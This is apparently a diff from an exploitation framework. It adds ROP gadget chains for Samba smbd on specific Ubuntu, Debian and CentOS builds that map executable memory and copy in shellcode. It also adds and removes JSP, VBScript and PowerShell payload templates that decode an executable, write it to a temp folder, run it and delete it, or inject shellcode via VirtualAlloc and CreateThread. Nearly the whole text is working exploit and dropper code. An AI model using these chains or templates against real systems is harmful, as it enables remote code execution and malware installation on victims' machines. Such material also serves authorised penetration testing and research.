+                <gadget offset="0x0006fe61">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00084000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00046dcd">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; ret ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget offset="0x00008532">xchg eax, ecx ; ret ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x000438ad">mov eax, ecx ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x000056e8">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x0006933f">pop eax ; ret</gadget>
+                <gadget offset="0x00084100">eax =  writable location, in GOT</gadget>
+                <gadget offset="0x000048ee">pop ebx ; ret</gadget>
+                <gadget offset="0x00084100">ebx =  writable location, in GOT</gadget>
+                <gadget offset="0x0004cccf">push esp ; add dword [eax], eax ; add byte [ebx+0x5E], bl ; pop edi ; pop ebp ; ret || edi = esp</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x00020bad">mov eax, edi ; pop ebx ; pop esi ; pop edi ; ret</gadget>
+                <gadget value ="0x00000000">junk for ebx</gadget>
+                <gadget value ="0x00000048">esi = value to add to esp to point to shellcode</gadget>
+                <gadget value ="0x00000000">junk for edi</gadget>
+                <gadget offset="0x0001ffef">xchg eax, ebx ; ret</gadget>
+                <gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x0006933f">pop eax; ret</gadget>
+                <gadget offset="0x00083024">memcpy@got - 4</gadget>
+                <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0001ffef">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x00004803">pop esi ; ret</gadget>
+                <gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00007af3">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x000104c5">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0001fdfa">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+</rop>
+<rop>
+	<compatibility>
+            <target>Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2</target>
+	</compatibility>
+
+        <!--
+        dpkg -l|grep libgcr
+        ii  libgcrypt11                        1.4.6-4ubuntu2                     LGPL Crypto library - runtime library
+        b69f8000-b6a69000 r-xp 00000000 08:01 17571      /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+        b6a69000-b6a6a000 r**p 00070000 08:01 17571      /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+        b6a6a000-b6a6c000 rw-p 00071000 08:01 17571      /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+
+        we arrive on rop chain with pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
+        4 first pops are after pop esp
+        -->
+        <gadgets base="0">
+                <gadget offset="0x00071ff4">ebx = offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">esi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x000641ff">pop eax; ret</gadget>
+                <gadget offset="0x00072010">mmap@got - 4</gadget>
+                <gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x00007f19">jmp eax</gadget>
+                <gadget offset="0x000046b1">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00073000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00041b85">mov dword [edx], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0005822d">esi = pop ebx ; pop esi ; pop edi ; ret</gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0005d903">xchg eax, edx ; ret ||  edx = eax , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x00043cd5">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000008 ; call esi || after call, esi = esp </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x00005c60">xchg eax, esi ; ret</gadget>
+                <gadget offset="0x0005c45c">pop ecx ; ret</gadget>
+                <gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x00053dc4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0005c6e9">xchg eax, ebx ; ret || ebx = src in memcpy</gadget>
+                <gadget offset="0x000641ff">pop eax; ret</gadget>
+                <gadget offset="0x00072ffc">writable add in GOT - 4</gadget>
+                <gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = mmaped addr</gadget>
+                <gadget offset="0x0005cd54">xchg eax, ecx ; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x000641ff">pop eax; ret</gadget>
+                <gadget offset="0x0007204c">memcpy@got - 4</gadget>
+                <gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0005c6e9">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x00060e5a">pop esi ; ret</gadget>
+                <gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00007d05">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x0005822d">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0005baca">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+    </rop>
+
+    <rop>
+        <compatibility>
+            <target>Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8</target>
+        </compatibility>
+
+        <!--
+        dpkg -l|grep libgcrypt
+        ii  libgcrypt11                        1.4.5-2ubuntu1                    LGPL Crypto library - runtime library
+        b6a20000-b6a91000 r-xp 00000000 08:01 17247      /lib/libgcrypt.so.11.5.3
+        b6a91000-b6a92000 r**p 00070000 08:01 17247      /lib/libgcrypt.so.11.5.3
+        b6a92000-b6a94000 rw-p 00071000 08:01 17247      /lib/libgcrypt.so.11.5.3
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x00004634">pop ebx ; pop ebp ; ret</gadget>
+                <gadget offset="0x00071ff4">offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0006421f">pop eax; ret</gadget>
+                <gadget offset="0x00072010">mmap@got - 4</gadget>
+                <gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x0000922c">jmp eax</gadget>
+                <gadget offset="0x00004631">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00073000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x000417af">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0005d923">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x00060e7a">pop esi ; ret</gadget>
+                <gadget offset="0x0005c47b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
+                <gadget offset="0x0003dbd8">push esp ; and al, 0x0C ; call esi</gadget>
+                <gadget offset="0x0006421f">pop eax ; ret</gadget>
+                <gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x00053c64">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00043999">xchg eax, ebx ; ret ||  ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x0006421f">pop eax; ret</gadget>
+                <gadget offset="0x00072094">memcpy@got - 4</gadget>
+                <gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x00043999">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <!-- set ecx to same value than edx -->
+                <gadget offset="0x0006ea7f">xchg eax, esi ; ret || save eax</gadget>
+                <gadget offset="0x0006421f">pop eax; ret</gadget>
+                <gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
+                <gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
+                <gadget offset="0x0005cd74"> xchg eax, ecx ; ret  ;  || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x0006ea7f"> xchg eax, esi ; ret  ; || restore eax</gadget>
+                <gadget offset="0x00060e7a">pop esi ; ret</gadget>
+                <gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00007e05">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x00058245">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x000128cc">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+
+
+    </rop>
+
+    <rop>
+        <compatibility>
+            <target>3.5.10-0.107.el5 on CentOS 5</target>
+        </compatibility>
+
+        <!--
+        yum list |grep libgcrypt
+        libgcrypt.i386                           1.4.4-5.el5                   installed
+        02c63000-02ce1000 r-xp 00000000 fd:00 929390     /usr/lib/libgcrypt.so.11.5.2
+        02ce1000-02ce4000 rwxp 0007d000 fd:00 929390     /usr/lib/libgcrypt.so.11.5.2
+        section is writable and executable, we'll copy the shellcode over there instead of using mmap
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
+                <gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget>
+                <gadget value ="0x00000000">esi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget>
+                <gadget offset="0x0006299c">pop ecx ; ret</gadget>
+                <gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget>
+                <gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget>
+                <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
+                <gadget offset="0x0006a73f">pop eax ; ret</gadget>
+                <gadget offset="0x0007effc">memcpy@got - 4</gadget>
+                <gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget>
+                <gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget>
+                <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
+                <gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0006299c">pop ecx ; ret</gadget>
+                <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
+                <gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget>
+                <gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">junk for ebp **1**</gadget>
+                <gadget offset="0x0006200a">pushad ; ret</gadget>
+                <gadget value ="size">payload size</gadget>
+        </gadgets>
+
+
+    </rop>
+
+
+
+
+
+    <!-- ROP CHAIN for smbd 2:3.5.11~dfsg-1ubuntu2   
+
+	<compatibility>
+            <target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
+	</compatibility>
+
+        <gadgets base="0">
+                <gadget offset="0x0000f3b1">pop eax; ret</gadget>
+                <gadget offset="0x00991ff0">mmap64@got</gadget>
+                <gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
+                <gadget offset="0x008c8997">jmp eax</gadget>
+                <gadget offset="0x0009ee21">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
+                <gadget offset="0x0034fbd2">pop edx ; ret</gadget>
+                <gadget offset="0x0099a000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x0034c2bc">mov dword [edx], eax ;  ret; ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget offset="0x001fc04c">mov ecx, eax; mov eax, ecx; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x000a1d24">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x001e0d59">push esp ; pop ebx ; pop esi ; ret || ebx = esp</gadget>
+                <gadget value ="0x00000000">junk for esi</gadget>
+                <gadget offset="0x0036fd9a">pop ebp ; ret</gadget>
+                <gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x001a73b2">add ebx, ebp ; ret   || ebx = src in memcpy</gadget>
+                <gadget offset="0x0008c5ac">pop eax; ret</gadget>
+                <gadget offset="0x00991904">memcpy@got</gadget>
+                <gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x001726b5">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x006a3bba">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x000b64ec">add esp, 0x4 ; pop esi ; pop edi ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0002ab2c">pushad, ret</gadget>
+                <gadget value ="size">payload size</gadget>
+        </gadgets>
+
+
+     ROP CHAIN for smbd 2:3.5.8~dfsg-1ubuntu2
+	<compatibility>
+            <target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
+        </compatibility>
+
+        <gadgets base="0">
+                <gadget offset="0x0000f445">pop eax; ret</gadget>
+                <gadget offset="0x008c1008">mmap64@got</gadget>
+                <gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
+                <gadget offset="0x0009e8e4">jmp eax</gadget>
+                <gadget offset="0x0009db61">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
+                <gadget offset="0x001f6142">pop edx ; ret</gadget>
+                <gadget offset="0x008c9000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00347b8c">mov dword [edx], eax ; pop ebp ; ret; ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x0021d553">mov ecx, eax; mov eax, ecx; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x001b1fe0">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x000e817f">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = esp</gadget>
+                <gadget offset="0x00277540">pop ebp ; ret</gadget>
+                <gadget value ="0x0000003c">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x0011d3a6">add eax, ebp ; mov ebx, 0x81FFF807 ; ret </gadget>
+                <gadget offset="0x0000cdea">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x0000f445">pop eax; ret</gadget>
+                <gadget offset="0x008c0964">memcpy@got</gadget>
+                <gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0000cdea">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x0009ee99">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x00148cc6">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0000dbcf">pushad, ret</gadget>
+                <gadget value ="size">payload size</gadget>
+            </gadgets>
+        -->
+        <!-- ROP CHAIN for smbd 2:3.5.6~dfsg-3squeeze6 
+	<compatibility
+            <target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
+	</compatibility>
+        <gadgets base="0">
+                <gadget offset="0x00021cd9">pop eax; ret</gadget>
+                <gadget offset="0x008cf86c">mmap64@got</gadget>
+                <gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
+                <gadget offset="0x000234e5">jmp eax</gadget>
+                <gadget offset="0x000b0331">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
+                <gadget offset="0x0001cf12">pop edx ; ret</gadget>
+                <gadget offset="0x008d6000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00353f4c">mov dword [edx], eax ; pop ebp ; ret; ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x000b98e9">mov ecx, eax; mov eax, ecx; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x006bffd2">mov edx, ecx ; mov eax, edx ; pop ebp ; ret || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x003660e4">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x00394107">pop ebp ; ret</gadget>
+                <gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x0017892d">add ebx, ebp ; ret   || ebx = src in memcpy</gadget>
+                <gadget offset="0x00021cd9">pop eax; ret</gadget>
+                <gadget offset="0x008cf1e8">memcpy@got</gadget>
+                <gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0001f666">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x000b9ac5">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x0033e7ea">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x00020453">pushad, ret</gadget>
+                <gadget value ="size">payload size</gadget>
+            </gadgets>
+            -->
+</db>
@@ -1,38 +0,0 @@
-<%%@ page import="java.io.*" %%>
-<%%
-  String %{var_payload} = "%{payload}";
-  String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
-
-  if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
-    %{var_exepath} = %{var_exepath}.concat(".exe");
-  }
-
-  int %{var_payloadlength} = %{var_payload}.length();
-  byte[] %{var_bytes} = new byte[%{var_payloadlength}/2];
-  for (int %{var_counter} = 0; %{var_counter} < %{var_payloadlength}; %{var_counter} += 2) {
-    %{var_bytes}[%{var_counter} / 2] = (byte) ((Character.digit(%{var_payload}.charAt(%{var_counter}), 16) << 4)
-                                              + Character.digit(%{var_payload}.charAt(%{var_counter}+1), 16));
-  }
-
-  FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
-  %{var_outputstream}.write(%{var_bytes});
-  %{var_outputstream}.flush();
-  %{var_outputstream}.close();
-
-  if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
-    String[] %{var_fperm} = new String[3];
-    %{var_fperm}[0] = "chmod";
-    %{var_fperm}[1] = "+x";
-    %{var_fperm}[2] = %{var_exepath};
-    Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
-    if (%{var_proc}.waitFor() == 0) {
-      %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
-    }
-
-    File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
-  } else {
-    String[] %{var_exepatharray} = new String[1];
-    %{var_exepatharray}[0] = %{var_exepath};
-    Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
-  }
-%%>
@@ -1,31 +1,23 @@
-Function %{var_decodefunc}(%{var_decodebase64})
-	%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
-		"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
-		%{var_decodebase64} & "</B64DECODE>"
-	Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
-	%{var_xmldoc}.LoadXML(%{var_xml})
-	%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
-	set %{var_xmldoc} = nothing
-End Function
-
 Function %{var_func}()
-	%{var_shellcode} = "%{base64_shellcode}"
+	%{var_shellcode} = "%{hex_shellcode}"
+
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+	Dim %{var_stream}
 	Dim %{var_tempdir}
+	Dim %{var_tempexe}
 	Dim %{var_basedir}
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
 	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
+	For i = 1 to Len(%{var_shellcode}) Step 2
+	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
+	Next
+	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
-	%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
-	Set %{var_adodbstream} = CreateObject("ADODB.Stream")
-	%{var_adodbstream}.Type = 1
-	%{var_adodbstream}.Open
-	%{var_adodbstream}.Write %{var_decoded}
-	%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
 	%{var_shell}.run %{var_tempexe}, 0, true
 	%{var_obj}.DeleteFile(%{var_tempexe})
 	%{var_obj}.DeleteFolder(%{var_basedir})
@@ -0,0 +1,51 @@
+<%%@ page import="java.io.*" %%>
+<%%
+	String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
+	String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
+	String %{var_data} = "";
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
+	{
+		%{var_exepath} = %{var_exepath}.concat(".exe");
+	}
+
+	FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
+	FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
+
+	int %{var_numbytes} = %{var_inputstream}.available();
+	byte %{var_bytearray}[] = new byte[%{var_numbytes}];
+	%{var_inputstream}.read(%{var_bytearray});
+	%{var_inputstream}.close();
+	byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
+	for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
+	{
+		char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
+		char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
+		int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
+		%{var_comb} <<= 4;
+		%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
+		%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
+	}
+
+	%{var_outputstream}.write(%{var_bytes});
+	%{var_outputstream}.close();
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
+		String[] %{var_fperm} = new String[3];
+		%{var_fperm}[0] = "chmod";
+		%{var_fperm}[1] = "+x";
+		%{var_fperm}[2] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
+		if (%{var_proc}.waitFor() == 0) {
+			%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+		}
+
+		File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
+	}
+	else
+	{
+		String[] %{var_exepatharray} = new String[1];
+		%{var_exepatharray}[0] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
+	}
+%%>
@@ -0,0 +1,30 @@
+Set-StrictMode -Version 2
+$%{var_syscode} = @"
+	using System;
+	using System.Runtime.InteropServices;
+	namespace %{var_kernel32} {
+		public class func {
+			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+		}
+	}
+"@
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
